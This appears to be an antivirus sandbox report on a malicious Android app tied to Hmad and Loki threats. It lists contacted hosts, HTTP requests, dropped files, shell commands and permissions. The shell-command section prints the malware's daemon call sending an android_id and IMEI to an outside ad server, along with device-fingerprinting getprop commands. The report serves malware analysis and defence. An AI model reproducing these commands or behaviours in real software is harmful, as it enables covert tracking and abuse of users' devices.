Technical information
Malicious functions:
Executes code of the following detected threats:
- Android.Hmad.1.origin
- Android.Hmad.2
- Android.Loki.18
- Android.Loki.6.origin
Gains access to the ITelephony private interface.
Network activity:
Connecting to:
- UDP(DNS) <Google DNS>
- TCP(HTTP/1.1) re####.haha####.com:80
- TCP(HTTP/1.1) www.haha####.com:80
- TCP(HTTP/1.1) www.wina####.com:8006
- TCP(HTTP/1.1) t####.talking####.net:80
- TCP(HTTP/1.1) net.haha####.com:80
- TCP(HTTP/1.1) r####.uu.qq.com:80
- TCP(TLS/1.0) jic.talking####.com:443
DNS requests:
- analy####.haha####.com
- e####.7####.com
- e####.h####.com
- e####.h####.com
- e####.h####.com
- ecup####.h####.com
- epup####.h####.com
- f####.guan####.com
- hgup####.e####.com
- hgup####.h####.com
- i####.cn
- jic.talking####.com
- net.haha####.com
- p####.h####.com
- r####.uu.qq.com
- re####.haha####.com
- t####.talking####.net
- up####.sdk.bat####.net
- ve####.ip####.com
- www.haha####.com
- www.wina####.com
HTTP GET requests:
- net.haha####.com/api/setting?app_id=####&sign=####
- net.haha####.com/request?p=eyJzb####
- re####.haha####.com/ad/find?platform=####&os_version=####&package_name=#...
- www.haha####.com/api/download_list.php?p=eyJ0c####
- www.haha####.com/api/strategy.php?p=eyJ0c####
HTTP POST requests:
- net.haha####.com/
- r####.uu.qq.com/rqd/sync
- t####.talking####.net/g/d
- www.wina####.com:8006/service/com.ads.basic.model.BeatInterval?code=####
- www.wina####.com:8006/service/com.ads.basic.model.ServerAddress?type=####
- www.wina####.com:8006/service/com.ads.sales.model.Installed
- www.wina####.com:8006/service/com.ads.sales.model.Mobile
- www.wina####.com:8006/service/com.like.system.model.ChipBind
Modified file system:
Creates the following files:
- <Package Folder>/app_jc/dfp.jar
- <Package Folder>/app_jc/dfx.jar
- <Package Folder>/app_jc/tfp.jar
- <Package Folder>/app_jc/tfx.jar
- <Package Folder>/app_jni/libskin
- <Package Folder>/databases/bugly_db_lejiagu-journal
- <Package Folder>/databases/fp.db-journal
- <Package Folder>/databases/fpdown.db-journal
- <Package Folder>/databases/fx_kit_unlock-journal
- <Package Folder>/databases/fxlock.db-journal
- <Package Folder>/databases/nativedroid.asa.sdk.db-journal
- <Package Folder>/databases/webview.db-journal
- <Package Folder>/er/cr.zip
- <Package Folder>/files/####/agent_log
- <Package Folder>/files/####/agent_log (deleted)
- <Package Folder>/files/####/crash_log
- <Package Folder>/files/####/plugin.jar
- <Package Folder>/files/####/temp_log
- <Package Folder>/files/TDtcagent.db
- <Package Folder>/files/TDtcagent.db-journal
- <Package Folder>/files/daemon
- <Package Folder>/files/td.lock
- <Package Folder>/mix.dex
- <Package Folder>/shared_prefs/<Package>_preferences.xml
- <Package Folder>/shared_prefs/ads_share_cache.pref.xml
- <Package Folder>/shared_prefs/batcloud.xml
- <Package Folder>/shared_prefs/bugly_data.xml
- <Package Folder>/shared_prefs/c_profile_sharepreference.xml
- <Package Folder>/shared_prefs/cached.pref.xml
- <Package Folder>/shared_prefs/com.nativedroid.sa.xml
- <Package Folder>/shared_prefs/device.xml
- <Package Folder>/shared_prefs/flowapp_shared.xml.xml
- <Package Folder>/shared_prefs/fpksp.xml
- <Package Folder>/shared_prefs/fpssp.xml
- <Package Folder>/shared_prefs/fxkit.xml
- <Package Folder>/shared_prefs/fxssp.xml
- <Package Folder>/shared_prefs/pref_longtime.xml
- <Package Folder>/shared_prefs/tdid.xml
- <Package Folder>/tx_shell/libshella-0.0.3.so
- <SD-Card>/.batcloud/####/bat_log.txt
- <SD-Card>/.nativedroid/adc
- <SD-Card>/.nativedroid/tick
- <SD-Card>/.tcookieid
- <SD-Card>/Android/####/.UUID
- <SD-Card>/FP.txt
Miscellaneous:
Executes next shell scripts:
- /system/bin/sh -c getprop ro.aa.romver
- /system/bin/sh -c getprop ro.board.platform
- /system/bin/sh -c getprop ro.build.fingerprint
- /system/bin/sh -c getprop ro.build.nubia.rom.name
- /system/bin/sh -c getprop ro.build.rom.id
- /system/bin/sh -c getprop ro.build.tyd.kbstyle_version
- /system/bin/sh -c getprop ro.build.version.emui
- /system/bin/sh -c getprop ro.build.version.opporom
- /system/bin/sh -c getprop ro.gn.gnromvernumber
- /system/bin/sh -c getprop ro.lenovo.series
- /system/bin/sh -c getprop ro.lewa.version
- /system/bin/sh -c getprop ro.meizu.product.model
- /system/bin/sh -c getprop ro.miui.ui.version.name
- /system/bin/sh -c getprop ro.vivo.os.build.display.id
- <Package Folder>/files/daemon --process_name <Package> --package_name <Package> --component_name com.nativedroid.sa.sdk.core.SAService --url http://www.hahamobi.com/api/uninstall.php?android_id=fe972356a9e02974'&'imei=<IMEI>'&'app_id=23278'&'time=1510833490599'&'sign=479d4e1dfd7bad13d50676326072edc1 --user_serial 0
- chmod 700 <Package Folder>/tx_shell/libshella-0.0.3.so
- chmod 775 <Package Folder>/files/daemon
- getprop
- getprop ro.aa.romver
- getprop ro.board.platform
- getprop ro.build.fingerprint
- getprop ro.build.nubia.rom.name
- getprop ro.build.rom.id
- getprop ro.build.tyd.kbstyle_version
- getprop ro.build.version.emui
- getprop ro.build.version.opporom
- getprop ro.build.version.release
- getprop ro.build.version.sdk
- getprop ro.gn.gnromvernumber
- getprop ro.lenovo.series
- getprop ro.lewa.version
- getprop ro.meizu.product.model
- getprop ro.miui.ui.version.name
- getprop ro.vivo.os.build.display.id
- logcat -d -v threadtime
- sh <Package Folder>/files/daemon --process_name <Package> --package_name <Package> --component_name com.nativedroid.sa.sdk.core.SAService --url http://www.hahamobi.com/api/uninstall.php?android_id=fe972356a9e02974'&'imei=<IMEI>'&'app_id=23278'&'time=1510833490599'&'sign=479d4e1dfd7bad13d50676326072edc1 --user_serial 0
Loads the following dynamic libraries:
- Bugly
- libshella-0.0.3
- libskin
Uses the following algorithms to encrypt data:
- DES-CBC-PKCS5Padding
Uses the following algorithms to decrypt data:
- DES
- DES-CBC-PKCS5Padding
Uses special library to hide executable bytecode.
Gains access to network information.
Gains access to telephone information (number, imei, etc.).
Gains access to information about APN settings.
Gains access to information about installed applications.
Gains access to information about running applications.
Gains access to information about accounts (Google, Facebook, etc.) registered on the device.
Adds tasks to the system scheduler.
Displays its own windows over windows of other applications.
